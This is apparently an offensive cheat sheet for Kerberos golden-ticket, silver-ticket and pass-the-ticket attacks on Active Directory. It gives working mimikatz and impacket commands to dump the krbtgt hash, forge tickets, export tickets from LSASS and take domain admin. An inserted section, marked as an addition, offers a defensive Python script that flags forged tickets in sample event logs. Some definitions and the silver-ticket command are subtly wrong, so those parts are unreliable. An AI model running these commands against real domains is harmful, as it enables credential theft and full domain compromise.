Golden, Silver and Pass-the-Ticket

  • Silver ticket is stealthier and more discreet; it is only valid for the targeted service

  • Golden ticket works for any Kerberos service in the domain

Description of terms:

  • TGT: ticket issued by the KDC for a service account; it can only be used to access that service.

  • KRBTGT: service account in the KDC that issues all TGTs. If we can impersonate this account and create a golden ticket, we are able to create a service ticket for any service.

Golden Ticket

using mimikatz

# dump hash and SID
lsadump::lsa /inject /name:krbtgt

# create ticket golden
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500

# open a new elevated command prompt with the given ticket in mimikatz.
misc::cmd

using impacket

impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid DOMAIN_SID -domain FQDN_DOMAIN USERNAME
# ticketer writes the ticket to USERNAME.ccache in the current directory
export KRB5CCNAME=USERNAME.ccache
impacket-psexec DOMAIN/USERNAME@TARGET_FQDN -k -no-pass
# impacket-secretsdump can be tried the same way

Silver Ticket

mimikatz

# dump
lsadump::lsa /inject /name:<domain-admin-account|service-account>

# create ticket silver
kerberos::golden /user:<USER> /domain:DOMAIN /sid:SID /krbtgt:SERVICE_NTLM_HASH /id:1103
misc::cmd
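The flip side of the golden and silver ticket sections above is what a defender sees. A forged TGT never passes through the KDC, so the account's service ticket requests (event 4769) arrive without a matching TGT request (event 4768), and mimikatz builds tickets with RC4-HMAC (encryption type 0x17) unless told otherwise, which stands out in a domain whose accounts use AES. The following script is an added example, not part of the original cheat sheet or of any of the tools it names: it runs both checks over a handful of constructed sample events. The event IDs and encryption-type codes are real Windows values; the timestamps, accounts, services and addresses are made up.

```python
# Added detection example (not from the original cheat sheet).
# Flags 4769 service-ticket requests that (a) have no prior 4768 TGT request
# for the same account within the TGT lifetime window, and/or (b) use an
# encryption type the domain does not normally issue (RC4-HMAC, 0x17).
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos encryption types as logged in the TicketEncryptionType field.
RC4_HMAC = 0x17
AES128 = 0x11
AES256 = 0x12

# Constructed sample events: (timestamp, event_id, account, service, etype, client_ip)
SAMPLE_EVENTS = [
    ("2024-01-10 08:00:05", 4768, "alice", "krbtgt",     AES256,   "10.0.0.21"),
    ("2024-01-10 08:00:06", 4769, "alice", "cifs/fs01",  AES256,   "10.0.0.21"),
    ("2024-01-10 09:15:00", 4769, "bob",   "cifs/fs01",  RC4_HMAC, "10.0.0.33"),  # no 4768, RC4
    ("2024-01-10 09:20:00", 4768, "carol", "krbtgt",     AES256,   "10.0.0.40"),
    ("2024-01-10 09:20:02", 4769, "carol", "http/web01", RC4_HMAC, "10.0.0.40"),  # RC4 only
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_forged_ticket_indicators(events, tgt_window=timedelta(hours=10),
                                  expected_etypes=(AES128, AES256)):
    """Return one finding per suspicious 4769 event, each with the reasons it tripped."""
    # Index TGT issuance times per account so every 4769 can be checked for a prior 4768.
    tgt_times = defaultdict(list)
    for ts, eid, acct, _svc, _etype, _ip in events:
        if eid == 4768:
            tgt_times[acct].append(parse_ts(ts))

    findings = []
    for ts, eid, acct, svc, etype, ip in events:
        if eid != 4769:
            continue
        t = parse_ts(ts)
        reasons = []
        # Golden-ticket indicator: the KDC never issued a TGT for this account.
        if not any(t - tgt_window <= issued <= t for issued in tgt_times[acct]):
            reasons.append("no 4768 TGT request for account within window")
        # Forged-ticket indicator: encryption type the domain does not normally issue.
        if etype not in expected_etypes:
            reasons.append(f"unexpected ticket encryption type 0x{etype:x}")
        if reasons:
            findings.append({"time": ts, "account": acct, "service": svc,
                             "client": ip, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_forged_ticket_indicators(SAMPLE_EVENTS):
        print(f)
```

Two caveats when running this against real data: the 4768 events must be collected from every domain controller, because the TGT may have been issued by a different DC than the one that later logged the 4769; and the correlation window should be at least the domain's maximum TGT lifetime (10 hours by default), otherwise a legitimately cached TGT produces false positives. RC4 alone is only a weak signal where legacy services or trusts still negotiate it.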

Pass-the-ticket

  • Can be used for dumping user credentials inside an AD network

  • Can dump the TGT from LSASS memory (LSASS stores Kerberos tickets and acts as the gatekeeper that accepts or rejects the credentials provided)

  • Gives a .kirbi ticket, which can be used to get domain admin

  • Allows escalation to domain admin if you dump a domain admin's ticket and then impersonate it

using mimikatz

# exports all .kirbi to current directory
sekurlsa::tickets /export

# pick an admin .kirbi issued by krbtgt and inject it into the current session
kerberos::ptt TICKET

# to check if ticket is working
klist
